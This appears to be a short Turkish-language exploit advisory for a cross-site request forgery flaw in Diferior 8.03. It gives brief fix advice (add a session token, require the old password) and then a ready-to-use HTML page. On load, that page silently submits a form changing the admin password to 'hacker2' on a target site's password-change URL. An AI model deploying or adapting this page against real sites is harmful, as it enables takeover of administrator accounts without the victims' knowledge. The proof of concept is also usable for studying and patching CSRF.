< ------------------- header data start ------------------- >

#############################################################

# Application Name : Diferior 8.03
# Vulnerable Type : Xsrf

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<bOdy onload=Submit();>
<script>function Submit(){document.system.submit();}</script>
<form action=http://demo.opensourcecms.com/diferior/user/profile/pass.html method=post class=reg_form name=system>
<input type=password name=pass1 value=hacker2 />
<input type=password name=pass2 value=hacker2 />
<input type=submit value=Change class=submit />
<input type=hidden name=cust_user value=admin />
</form>

< -- bug code end of -- >